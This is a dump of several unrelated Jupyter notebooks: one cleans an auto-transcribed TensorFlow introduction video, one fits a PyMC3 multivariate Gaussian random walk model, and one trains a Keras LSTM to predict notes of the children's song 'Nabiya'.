tensorflow GE Healthcare is training a neural network\nto identify specific anatomic during the brain MRI exam\nto help improve speed and reliability now PayPal\nis using it as a flow to stay at The Cutting Edge of fraud detection using tensorflow deep\ntrance for Learning and Generator modeling PayPal has been able to recognize complex fraud patterns to\nincrease fraud decline accuracy while improving the experience\nof legitimate users through increased Precision\nin identification. China mobile is using tensorflow\nto improve their success rate of the network element\ncut overs Channel while has created\na deep Fist amusing tensorflow that can automatically predicts\nthe cut over time window verify log operations and detect Network anomalies and this has already\nsuccessfully supported the world's largest relocation\nof hundreds of millions iot HSS. Let's talk about\nthe tensorflow feature. What makes it stand out\nfrom the other competition. So Tessa flow offers\nmultiple level of abstractions, so you can choose\nthe right one for your needs. You can build and train models by using\nthe high-level Kira's API, which makes getting started with tensorflow and machine\nlearning very very easy. If you need more flexibility\nIker execution allows for immediate iteration\nand intuitive debugging when you enable eager execution, you will be executing\ntensorflow kernels immediately rather than constructing graphs that will be executed\nlater know it provides a direct path to protection whether it's on servos\nthe S devices or the web tensorflow lets\nyou train and deploy your model. Really no matter what language or the platform you\nare using you can build and train the state-of-the-art\nmodels without sacrificing speed or performance. That's the flow gives\nyou the flexibility and the control with features\nlike Kira's functional API and model subclassing\nAPA for creation of complex topologies. There's a flow also\nsupports an ecosystem of powerful add on libraries and models to experiment\nwith the tisza flows name directly derived from\nits core framework. It does a flow all\nthe computation involves tensor. 
So a tensor is a vector\nor a matrix of n Dimensions that represents the type all\nthe operations are conducted inside a graph and the graph\nis set of a computation that takes place successively. Each operation is\ncalled an open note and are connected to each other. There's a flow allows\nthe developers to create a data flow graphs\nwhich are structures that describe how the data move\nthrough a graph or a series of processing nodes. Each node in the graph represents a mathematical\noperation and each connection or Edge between the notes is\na multi-dimensional data array or tensile test flow\nprovides all of this for the programmer by way of the Python language\nby then is easy to learn and work with and provides\nconvenient ways to express how high-level abstraction\ncan be coupled together notes and the tensor in the tensorflow\nour python objects. And there's a flow\napplications are themselves quite an application. Now the actual math operations\nhowever are not performed in Python the libraries of transformation data available\nthrough tears flow are written as high performance C++ binaries\npython just directs the traffic between the pieces and provides high level\nprogramming attraction to hook them together now\nbuilding a new rail. It works cannot get\nany more simpler. Usually any machine learning or deep learning process\nhas some similar steps, but in this case of terms\nof flow it is so simple any typical machine learning\nlife Lord any process has some of the steps like collection of data set than building\nthe model training the network evaluating the model and then predicting the outcome\nin case of tensorflow. Most of the time is occupied\nin the collection of data set now building a model\nrequires only a few lines of code training. The network is just a single\nline evaluating the network or the model itself is a single\nline of code and predicting. The model is also a single line\nof code now training a neural network cannot get\nany more easier than this and that is why it is\nthe flow remains at the top when compared to\nthe other competitors. Now, that's a for competes with a slew of other machine\nlearning Frameworks like python or C. NT K and M. And next these are\nthe three major Frameworks that address many\nof the same needs now pie torch in addition\nto being built in Python and as many other similarities to tensorflow the hardware\naccelerated components under the hood a highly\ninteractive development model that allows for Designing as you go work and many useful\ncomponents are already included. Now PyTorch is\ngenerally a better choice for fast development of projects that need to be up\nand running in a short time but tensorflow wins out\nfor larger projects and more complex workflows CNTK the Microsoft\ncognitive toolkit, like tensorflow uses\na graph structure to describe the data flow, but it focuses more on creating deep learning\nneural network siente que handles many neural network jobs\nfaster and has a broader set of apis for python C++ C sharp and Java but C NT K\nisn't currently as easy to learn or deployed as tensorflow. No talking about Apache MXNet adopted by Amazon as a premier\ndeep learning framework on AWS can scale almost linearly across multiple gpus\nand multiple machine. It also supports a broad range of languages API\nlike python C++. scala R JavaScript\nJulia and go although its native a parent\nas pleasant to work with as tensorflow. 
It is also in the\nmarket another thing that gives tensorflow Edge over\nother competitors is the fact that it is open source and has\na huge Community Support that not only provides\nresearchers a way to build new models, but also a platform\nto interact with others that face some issues if we talk about a simple\nprogram in terms of flow. So any program basically\nconsists of a construction phase and then an execution phase\nthe construction phase where you build a graph\nand execution phase is where you need\nto evaluate the graph and then create a session then\ninitialize all the variables. So as you can see\nhere in the example of geometric sequencing it\nis so easy to execute and if this is also hard for you, there's a float\n2.0 the latest release makes this even easier to code it\nhas eager execution by default which makes things so\nmuch simpler and easier. So as you can see\nwith either X You should our program has a strong\nto a few lines of code. So guys, that's it\nfor the session. I hope you got to know\ntensorflow what exactly it is and how useful it is go ahead and create your own deep learning models\nand see for yourself. What an incredible framework\nthis is till then thank you and happy learning. I hope you have enjoyed\nlistening to this video. Please be kind enough to like it and you can comment any\nof your doubts and queries and we will reply them at the earliest do look out\nfor more videos in our playlist And subscribe to Edureka channel to learn more. Happy learning.\n"
],
[
"doc=[]\nfor line in transcript:\n if \"\\n\" in line['text']:\n x=line['text'].replace(\"\\n\",\" \")\n doc.append(x)\n else:\n doc.append(line['text'])\nprint(doc)",
"['Machine learning is a complex discipline', 'but implementing machine learning models is far', 'less daunting and difficult', 'than it used to be. Thanks', \"to machine learning Frameworks such as Google's TensorFlow\", 'that ease the process', 'of acquiring data, training model, solving predictions', 'and refining future results. Created by', 'the Google brain team tensorflow is an open source library', 'for numerical computation', 'and large scale machine learning. Tensorflow bundles together', 'a study of machine learning', 'and deep learning models', 'and algorithms and make them useful by way', 'of common metaphor', 'who will use machine learning and all of its products', 'to improve the search engine the translation image captioning', 'or the recommendations to give you a concrete example,', 'Google users can experience a faster and more refined search', 'with artificial intelligence.', 'If the user types a keyword in the search bar Google', 'provides a recommendation about what could be the next world not', 'as a flow is being used by a lot of Companies', 'in the industries and to name a few first', \"let's start with Airbnb,\", 'the leading Global Online Marketplace', 'and Hospitality service.', 'The Airbnb ingenious and data science team', 'applies machine learning', 'using tensorflow to classify the images', 'and detect objects', 'at scale helping to improve the guest experience', 'and we talked', 'about the healthcare industry using tensorflow GE Healthcare', 'is training a neural network to identify specific anatomic', 'during the brain MRI exam to help improve speed', 'and reliability now PayPal is using it as a flow to stay', 'at The Cutting Edge', 'of fraud detection', 'using tensorflow deep trance for Learning', 'and Generator modeling PayPal', 'has been able to recognize', 'complex fraud patterns to increase fraud decline accuracy', 'while improving the experience of legitimate users', 'through increased Precision in identification.', 'China mobile is using tensorflow to improve their success rate', 'of the network element cut overs Channel', 'while has created a deep Fist amusing tensorflow', 'that can automatically predicts the cut over time window', 'verify log operations', 'and detect Network anomalies', 'and this has already successfully supported', \"the world's largest relocation of hundreds of millions iot HSS.\", \"Let's talk about the tensorflow feature.\", 'What makes it stand out from the other competition.', 'So Tessa flow offers multiple level of abstractions,', 'so you can choose the right one for your needs.', 'You can build', \"and train models by using the high-level Kira's API,\", 'which makes getting started', 'with tensorflow and machine learning very very easy.', 'If you need more flexibility Iker execution allows', 'for immediate iteration and intuitive debugging', 'when you enable eager execution,', 'you will be executing tensorflow kernels immediately', 'rather than constructing graphs', 'that will be executed later know it provides', 'a direct path to protection', \"whether it's on servos the S devices\", 'or the web tensorflow lets you train and deploy your model.', 'Really no matter what language', 'or the platform you are using you can build', 'and train the state-of-the-art models without sacrificing', 'speed or performance.', \"That's the flow gives you the flexibility\", \"and the control with features like Kira's functional API\", 'and model subclassing APA for creation', 'of complex topologies.', \"There's a flow also supports an 
ecosystem\", 'of powerful add on libraries', 'and models to experiment with the tisza flows name', 'directly derived from its core framework.', 'It does a flow all the computation involves tensor.', 'So a tensor is a vector or a matrix of n Dimensions', 'that represents the type all the operations are conducted', 'inside a graph and the graph is set of a computation', 'that takes place successively.', 'Each operation is called an open note', 'and are connected to each other.', \"There's a flow allows the developers to create\", 'a data flow graphs which are structures', 'that describe how the data move through a graph or a series', 'of processing nodes.', 'Each node in the graph', 'represents a mathematical operation and each connection', 'or Edge between the notes is a multi-dimensional data array', 'or tensile test flow provides all of this', 'for the programmer by way', 'of the Python language by then is easy to learn', 'and work with and provides convenient ways to express', 'how high-level abstraction can be coupled together notes', 'and the tensor in the tensorflow our python objects.', \"And there's a flow applications are themselves\", 'quite an application.', 'Now the actual math operations however are not performed', 'in Python the libraries', 'of transformation data available through tears flow are written', 'as high performance C++ binaries python just directs the traffic', 'between the pieces', 'and provides high level programming attraction to hook', 'them together now building a new rail.', 'It works cannot get any more simpler.', 'Usually any machine learning', 'or deep learning process has some similar steps,', 'but in this case of terms of flow it is so simple', 'any typical machine learning life Lord any process has some', 'of the steps like collection', 'of data set than building the model training the network', 'evaluating the model', 'and then predicting the outcome in case of tensorflow.', 'Most of the time is occupied in the collection', 'of data set now building a model requires only a few lines', 'of code training.', 'The network is just a single line evaluating the network', 'or the model itself is a single line of code and predicting.', 'The model is also a single line of code now training', 'a neural network cannot get any more easier than this', 'and that is why it is the flow remains at the top', 'when compared to the other competitors.', \"Now, that's a for competes\", 'with a slew of other machine learning Frameworks like python', 'or C. 
NT K and M.', 'And next these are the three major Frameworks', 'that address many of the same needs now', 'pie torch in addition to being built in Python', 'and as many other similarities', 'to tensorflow the hardware accelerated components', 'under the hood a highly interactive development model', 'that allows for Designing', 'as you go work and many useful components are already included.', 'Now PyTorch is generally a better choice', 'for fast development of projects', 'that need to be up and running in a short time', 'but tensorflow wins out for larger projects', 'and more complex workflows', 'CNTK the Microsoft cognitive toolkit,', 'like tensorflow uses a graph structure', 'to describe the data flow,', 'but it focuses more', 'on creating deep learning neural network siente que', 'handles many neural network jobs faster and has a broader set', 'of apis for python C++ C sharp', \"and Java but C NT K isn't currently as easy to learn\", 'or deployed as tensorflow.', 'No talking about Apache MXNet', 'adopted by Amazon as a premier deep learning framework', 'on AWS can scale almost linearly', 'across multiple gpus and multiple machine.', 'It also supports a broad range', 'of languages API like python C++.', 'scala R JavaScript Julia and go', 'although its native a parent as pleasant to work', 'with as tensorflow.', 'It is also in the market another thing', 'that gives tensorflow Edge over other competitors is the fact', 'that it is open source and has a huge Community Support', 'that not only provides researchers a way', 'to build new models,', 'but also a platform to interact with others', 'that face some issues', 'if we talk about a simple program in terms of flow.', 'So any program basically consists of a construction phase', 'and then an execution phase the construction phase', 'where you build a graph and execution phase is', 'where you need to evaluate the graph', 'and then create a session then initialize all the variables.', 'So as you can see here in the example', 'of geometric sequencing it is so easy to execute and', 'if this is also hard for you,', \"there's a float 2.0 the latest release makes\", 'this even easier to code it has eager execution by default', 'which makes things so much simpler and easier.', 'So as you can see with either X You', 'should our program has a strong to a few lines of code.', \"So guys, that's it for the session.\", 'I hope you got to know tensorflow what exactly it is', 'and how useful it is go ahead', 'and create your own', 'deep learning models and see for yourself.', 'What an incredible framework this is till then thank you', 'and happy learning.', 'I hope you have enjoyed listening to this video.', 'Please be kind enough to like it', 'and you can comment any of your doubts and queries', 'and we will reply them', 'at the earliest do look out for more videos in our playlist', 'And subscribe to Edureka channel to learn more.', 'Happy learning.']\n"
],
[
"paragraph=\" \".join(doc)\nprint(paragraph)",
"Machine learning is a complex discipline but implementing machine learning models is far less daunting and difficult than it used to be. Thanks to machine learning Frameworks such as Google's TensorFlow that ease the process of acquiring data, training model, solving predictions and refining future results. Created by the Google brain team tensorflow is an open source library for numerical computation and large scale machine learning. Tensorflow bundles together a study of machine learning and deep learning models and algorithms and make them useful by way of common metaphor who will use machine learning and all of its products to improve the search engine the translation image captioning or the recommendations to give you a concrete example, Google users can experience a faster and more refined search with artificial intelligence. If the user types a keyword in the search bar Google provides a recommendation about what could be the next world not as a flow is being used by a lot of Companies in the industries and to name a few first let's start with Airbnb, the leading Global Online Marketplace and Hospitality service. The Airbnb ingenious and data science team applies machine learning using tensorflow to classify the images and detect objects at scale helping to improve the guest experience and we talked about the healthcare industry using tensorflow GE Healthcare is training a neural network to identify specific anatomic during the brain MRI exam to help improve speed and reliability now PayPal is using it as a flow to stay at The Cutting Edge of fraud detection using tensorflow deep trance for Learning and Generator modeling PayPal has been able to recognize complex fraud patterns to increase fraud decline accuracy while improving the experience of legitimate users through increased Precision in identification. China mobile is using tensorflow to improve their success rate of the network element cut overs Channel while has created a deep Fist amusing tensorflow that can automatically predicts the cut over time window verify log operations and detect Network anomalies and this has already successfully supported the world's largest relocation of hundreds of millions iot HSS. Let's talk about the tensorflow feature. What makes it stand out from the other competition. So Tessa flow offers multiple level of abstractions, so you can choose the right one for your needs. You can build and train models by using the high-level Kira's API, which makes getting started with tensorflow and machine learning very very easy. If you need more flexibility Iker execution allows for immediate iteration and intuitive debugging when you enable eager execution, you will be executing tensorflow kernels immediately rather than constructing graphs that will be executed later know it provides a direct path to protection whether it's on servos the S devices or the web tensorflow lets you train and deploy your model. Really no matter what language or the platform you are using you can build and train the state-of-the-art models without sacrificing speed or performance. That's the flow gives you the flexibility and the control with features like Kira's functional API and model subclassing APA for creation of complex topologies. There's a flow also supports an ecosystem of powerful add on libraries and models to experiment with the tisza flows name directly derived from its core framework. It does a flow all the computation involves tensor. 
So a tensor is a vector or a matrix of n Dimensions that represents the type all the operations are conducted inside a graph and the graph is set of a computation that takes place successively. Each operation is called an open note and are connected to each other. There's a flow allows the developers to create a data flow graphs which are structures that describe how the data move through a graph or a series of processing nodes. Each node in the graph represents a mathematical operation and each connection or Edge between the notes is a multi-dimensional data array or tensile test flow provides all of this for the programmer by way of the Python language by then is easy to learn and work with and provides convenient ways to express how high-level abstraction can be coupled together notes and the tensor in the tensorflow our python objects. And there's a flow applications are themselves quite an application. Now the actual math operations however are not performed in Python the libraries of transformation data available through tears flow are written as high performance C++ binaries python just directs the traffic between the pieces and provides high level programming attraction to hook them together now building a new rail. It works cannot get any more simpler. Usually any machine learning or deep learning process has some similar steps, but in this case of terms of flow it is so simple any typical machine learning life Lord any process has some of the steps like collection of data set than building the model training the network evaluating the model and then predicting the outcome in case of tensorflow. Most of the time is occupied in the collection of data set now building a model requires only a few lines of code training. The network is just a single line evaluating the network or the model itself is a single line of code and predicting. The model is also a single line of code now training a neural network cannot get any more easier than this and that is why it is the flow remains at the top when compared to the other competitors. Now, that's a for competes with a slew of other machine learning Frameworks like python or C. NT K and M. And next these are the three major Frameworks that address many of the same needs now pie torch in addition to being built in Python and as many other similarities to tensorflow the hardware accelerated components under the hood a highly interactive development model that allows for Designing as you go work and many useful components are already included. Now PyTorch is generally a better choice for fast development of projects that need to be up and running in a short time but tensorflow wins out for larger projects and more complex workflows CNTK the Microsoft cognitive toolkit, like tensorflow uses a graph structure to describe the data flow, but it focuses more on creating deep learning neural network siente que handles many neural network jobs faster and has a broader set of apis for python C++ C sharp and Java but C NT K isn't currently as easy to learn or deployed as tensorflow. No talking about Apache MXNet adopted by Amazon as a premier deep learning framework on AWS can scale almost linearly across multiple gpus and multiple machine. It also supports a broad range of languages API like python C++. scala R JavaScript Julia and go although its native a parent as pleasant to work with as tensorflow. 
It is also in the market another thing that gives tensorflow Edge over other competitors is the fact that it is open source and has a huge Community Support that not only provides researchers a way to build new models, but also a platform to interact with others that face some issues if we talk about a simple program in terms of flow. So any program basically consists of a construction phase and then an execution phase the construction phase where you build a graph and execution phase is where you need to evaluate the graph and then create a session then initialize all the variables. So as you can see here in the example of geometric sequencing it is so easy to execute and if this is also hard for you, there's a float 2.0 the latest release makes this even easier to code it has eager execution by default which makes things so much simpler and easier. So as you can see with either X You should our program has a strong to a few lines of code. So guys, that's it for the session. I hope you got to know tensorflow what exactly it is and how useful it is go ahead and create your own deep learning models and see for yourself. What an incredible framework this is till then thank you and happy learning. I hope you have enjoyed listening to this video. Please be kind enough to like it and you can comment any of your doubts and queries and we will reply them at the earliest do look out for more videos in our playlist And subscribe to Edureka channel to learn more. Happy learning.\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7072fb000d04550093404ab03e745e16f20de63 | 113,158 | ipynb | Jupyter Notebook | docs/source/notebooks/MvGaussianRandomWalk_demo.ipynb | himkt/pymc3 | a3af00d98a329d580ba6494e2483348a0971dafe | [
"Apache-2.0"
] | 1 | 2021-04-20T04:45:16.000Z | 2021-04-20T04:45:16.000Z | docs/source/notebooks/MvGaussianRandomWalk_demo.ipynb | himkt/pymc3 | a3af00d98a329d580ba6494e2483348a0971dafe | [
"Apache-2.0"
] | 2 | 2017-03-02T05:56:13.000Z | 2019-12-06T19:15:42.000Z | docs/source/notebooks/MvGaussianRandomWalk_demo.ipynb | himkt/pymc3 | a3af00d98a329d580ba6494e2483348a0971dafe | [
"Apache-2.0"
] | 1 | 2018-10-08T10:27:35.000Z | 2018-10-08T10:27:35.000Z | 419.103704 | 60,678 | 0.922348 | [
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import cholesky\n\nimport pymc3 as pm\nimport theano\n\nnp.random.seed(42)\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"Simulate the data:",
"_____no_output_____"
]
],
[
[
"D = 3\nN = 300\nsections = 5\nperiod = N/sections\n\nSigma_a = np.random.randn(D, D)\nSigma_a = Sigma_a.T.dot(Sigma_a)\nL_a = cholesky(Sigma_a, lower=True)\n\nSigma_b = np.random.randn(D, D)\nSigma_b = Sigma_b.T.dot(Sigma_b)\nL_b = cholesky(Sigma_b, lower=True)\n\n# Gaussian Random walk:\nalpha = np.cumsum(L_a.dot(np.random.randn(D, sections)), axis=1).T\nbeta = np.cumsum(L_b.dot(np.random.randn(D, sections)), axis=1).T\nsigma = 0.1\n\nt = np.arange(N)[:, None]/ N\nalpha = np.repeat(alpha, period, axis=0)\nbeta = np.repeat(beta, period, axis=0)\ny = alpha + beta*t + sigma*np.random.randn(N, 1)",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 5))\nplt.plot(t, y)\nplt.title('Three Correlated Series')\nplt.show()",
"_____no_output_____"
],
[
"class Scaler():\n def __init__(self):\n mean_ = None\n std_ = None\n \n def transform(self, x):\n return (x - self.mean_) / self.std_\n \n def fit_transform(self, x):\n self.mean_ = x.mean(axis=0)\n self.std_ = x.std(axis=0)\n return self.transform(x)\n \n def inverse_transform(self, x):\n return x*self.std_ + self.mean_",
"_____no_output_____"
],
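[
"# Added usage sketch for the Scaler above: fit_transform standardizes each column to zero mean\n# and unit variance, and inverse_transform undoes it exactly.\n_scaler = Scaler()\n_z = _scaler.fit_transform(y)\nprint(np.allclose(_scaler.inverse_transform(_z), y))",
"_____no_output_____"
],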
[
"def inference(t, y, sections, n_samples=100):\n N, D = y.shape\n \n # Standardies y and t\n y_scaler = Scaler()\n t_scaler = Scaler()\n y = y_scaler.fit_transform(y)\n t = t_scaler.fit_transform(t)\n # Create a section index\n t_section = np.repeat(np.arange(sections), N/sections)\n \n # Create theano equivalent\n t_t = theano.shared(np.repeat(t, D, axis=1))\n y_t = theano.shared(y)\n t_section_t = theano.shared(t_section)\n\n with pm.Model() as model:\n packed_L_α = pm.LKJCholeskyCov('packed_L_α', n=D, \n eta=2., sd_dist=pm.HalfCauchy.dist(2.5))\n L_α = pm.expand_packed_triangular(D, packed_L_α)\n\n packed_L_β = pm.LKJCholeskyCov('packed_L_β', n=D, \n eta=2., sd_dist=pm.HalfCauchy.dist(2.5))\n L_β = pm.expand_packed_triangular(D, packed_L_β)\n\n α = pm.MvGaussianRandomWalk('alpha', shape=(sections, D), chol=L_α)\n β = pm.MvGaussianRandomWalk('beta', shape=(sections, D), chol=L_β)\n alpha_r = α[t_section_t]\n beta_r = β[t_section_t]\n regression = alpha_r+beta_r*t_t\n\n sd = pm.Uniform('sd', 0, 1)\n likelihood = pm.Normal('y', mu=regression, sd=sd, observed=y_t)\n trace = pm.sample(n_samples, cores=4)\n\n return trace, y_scaler, t_scaler, t_section",
"_____no_output_____"
],
[
"trace, y_scaler, t_scaler, t_section = inference(t, y, sections)",
"Auto-assigning NUTS sampler...\nInitializing NUTS using jitter+adapt_diag...\n 99%|█████████▉| 594/600 [08:32<00:05, 1.16it/s]/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 1 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 1 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:451: UserWarning: The acceptance probability in chain 1 does not match the target. It is 0.536618056712, but should be close to 0.8. Try to increase the number of tuning steps.\n % (self._chain_id, mean_accept, target_accept))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 1 contains 19 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 2 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 2 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:451: UserWarning: The acceptance probability in chain 2 does not match the target. It is 0.691331874096, but should be close to 0.8. Try to increase the number of tuning steps.\n % (self._chain_id, mean_accept, target_accept))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 2 contains 8 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n100%|██████████| 600/600 [08:38<00:00, 1.16it/s]/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 0 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 0 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 0 contains 5 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:429: UserWarning: Chain 3 contains only 100 samples.\n % (self._chain_id, n))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:459: UserWarning: Chain 3 reached the maximum tree depth. Increase max_treedepth, increase target_accept or reparameterize.\n 'reparameterize.' % self._chain_id)\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:451: UserWarning: The acceptance probability in chain 3 does not match the target. It is 0.550616532328, but should be close to 0.8. Try to increase the number of tuning steps.\n % (self._chain_id, mean_accept, target_accept))\n/home/jovyan/pymc3/pymc3/step_methods/hmc/nuts.py:467: UserWarning: Chain 3 contains 18 diverging samples after tuning. If increasing `target_accept` does not help try to reparameterize.\n % (self._chain_id, n_diverging))\n"
]
],
[
[
"Predict the mean expected y value.",
"_____no_output_____"
]
],
[
[
"a_mean = trace['alpha'][-1000:].mean(axis=0)\nb_mean = trace['beta'][-1000:].mean(axis=0)\n\ny_pred = y_scaler.inverse_transform(a_mean[t_section] + b_mean[t_section]*t_scaler.transform(t))",
"_____no_output_____"
],
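[
"# Added fit diagnostic (a sketch, not in the original demo): root-mean-square error of the\n# posterior-mean prediction against the observed series.\nprint(np.sqrt(np.mean((y - y_pred)**2)))",
"_____no_output_____"
],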
[
"plt.figure(figsize=(12, 5))\nplt.gca().set_prop_cycle('color', ['red', 'green', 'blue'])\nplt.plot(t, y, '.')\nplt.plot(t, y_pred)\nplt.title('Mean Prediction of Three Correlated Series')\nplt.show()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
e707304c74a571cd2e4293ebd735bfc27f7269ed | 287,731 | ipynb | Jupyter Notebook | notescale_LSTM.ipynb | mmeooo/test_deeplearning | 5e3a9716de253e4bf864e680b3a47f8ae8d87bd6 | [
"Apache-2.0"
] | null | null | null | notescale_LSTM.ipynb | mmeooo/test_deeplearning | 5e3a9716de253e4bf864e680b3a47f8ae8d87bd6 | [
"Apache-2.0"
] | null | null | null | notescale_LSTM.ipynb | mmeooo/test_deeplearning | 5e3a9716de253e4bf864e680b3a47f8ae8d87bd6 | [
"Apache-2.0"
] | null | null | null | 110.495776 | 136,378 | 0.648602 | [
[
[
"# '나비야' 악보 계명\n\nnote_seq = ['g8', 'e8', 'e4', 'f8', 'd8', 'd4', 'c8', 'd8', 'e8', 'f8', 'g8', 'g8', 'g4',\n 'g8', 'e8', 'e8', 'e8', 'f8', 'd8', 'd4', 'c8', 'e8', 'g8', 'g8', 'e8', 'e8', 'e4',\n 'd8', 'd8', 'd8', 'd8', 'd8', 'e8', 'f4', 'e8', 'e8', 'e8', 'e8', 'e8', 'f8', 'g4',\n 'g8', 'e8', 'e4', 'f8', 'd8', 'd4', 'c8', 'e8', 'g8', 'g8', 'e8', 'e8', 'e4']",
"_____no_output_____"
],
[
"# 악보 사전 (딕셔너리)\n\ncode2idx = {'c4':0, 'd4':1, 'e4':2, 'f4':3, 'g4':4, 'a4':5, 'b4':6,\n 'c8':7, 'd8':8, 'e8':9, 'f8':10, 'g8':11, 'a8':12, 'b8':13}",
"_____no_output_____"
],
[
"note_seq[0:4], note_seq[1:5], note_seq[2:6]",
"_____no_output_____"
]
],
[
[
"# Data preprocessing",
"_____no_output_____"
]
],
[
[
"range(len(note_seq)-4) # 4개씩 묶기 위해 50까지 출력",
"_____no_output_____"
],
[
"dataset = list()\nfor i in range(len(note_seq)-4):\n subset = note_seq[i:i+4] # [g8, e8,,,]\n items = list()\n\n for item in subset:\n items.append(code2idx[item]) # item은 key값, code2index[item]는 value값(숫자)\n \n dataset.append(items)\nprint(dataset)",
"[[11, 9, 2, 10], [9, 2, 10, 8], [2, 10, 8, 1], [10, 8, 1, 7], [8, 1, 7, 8], [1, 7, 8, 9], [7, 8, 9, 10], [8, 9, 10, 11], [9, 10, 11, 11], [10, 11, 11, 4], [11, 11, 4, 11], [11, 4, 11, 9], [4, 11, 9, 9], [11, 9, 9, 9], [9, 9, 9, 10], [9, 9, 10, 8], [9, 10, 8, 1], [10, 8, 1, 7], [8, 1, 7, 9], [1, 7, 9, 11], [7, 9, 11, 11], [9, 11, 11, 9], [11, 11, 9, 9], [11, 9, 9, 2], [9, 9, 2, 8], [9, 2, 8, 8], [2, 8, 8, 8], [8, 8, 8, 8], [8, 8, 8, 8], [8, 8, 8, 9], [8, 8, 9, 3], [8, 9, 3, 9], [9, 3, 9, 9], [3, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 10], [9, 9, 10, 4], [9, 10, 4, 11], [10, 4, 11, 9], [4, 11, 9, 2], [11, 9, 2, 10], [9, 2, 10, 8], [2, 10, 8, 1], [10, 8, 1, 7], [8, 1, 7, 9], [1, 7, 9, 11], [7, 9, 11, 11], [9, 11, 11, 9], [11, 11, 9, 9]]\n"
],
[
"import numpy as np\n\ndatasets = np.array(dataset)",
"_____no_output_____"
],
[
"x_train = datasets[:, 0:3] # 1행에 3열씩 데이터 나눔\nx_train.shape",
"_____no_output_____"
],
[
"y_train = datasets[:,3] # dataset의 인덱스3 값만 뽑음\ny_train.shape",
"_____no_output_____"
],
[
"# 정규화: code2idx의 max값으로 나눔\n\nx_train = x_train / 13\nx_train[3]",
"_____no_output_____"
]
],
[
[
"# Make model",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf",
"_____no_output_____"
],
[
"x_train.shape # Input size= 3 (컬럼 개수)\nx_train[2]",
"_____no_output_____"
],
[
"# numpy 배열(1차원 scaler) -> tensorflow type(matrix) 으로 바꾸기\n\nx_train = np.reshape(x_train, (50, 3, 1))\nx_train.shape, x_train[2]",
"_____no_output_____"
],
[
"np.unique(y_train) # y_train은 9개지만 code2idx는 총 13개임",
"_____no_output_____"
],
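[
"# Added sketch (not in the original notebook): invert code2idx so that predicted class indices\n# can be decoded back into note names after training.\nidx2code = {v: k for k, v in code2idx.items()}\nidx2code[11]",
"_____no_output_____"
],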
[
"model = tf.keras.Sequential()\n\n# Input Layer \nmodel.add(tf.keras.layers.Input(shape=(3,1)))\n# 값을 그대로 쓰는거라 embedding 할 필요 없음\n# (batch_size, timesteps, input_dim) -> (rows, cols, 1)\n# **kwargs-> dict, *kwargs-> list\n\n# Hidden Layer\nmodel.add(tf.keras.layers.LSTM(128))\n\n# Output Layer\nmodel.add(tf.keras.layers.Dense(13, activation='softmax'))\n\n# Gadget\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n# onehot-encoding 안 함 -> sparse_categorical_crossentropy\n# onehot-encoding 함 -> categorical_crossentropy",
"WARNING:tensorflow:Please add `keras.layers.InputLayer` instead of `keras.Input` to Sequential model. `keras.Input` is intended to be used by Functional model.\n"
],
[
"hist = model.fit(x_train, y_train, epochs=1000, batch_size=5)\n\n# batch_size= 5 -> step size= 50/5= 10 ",
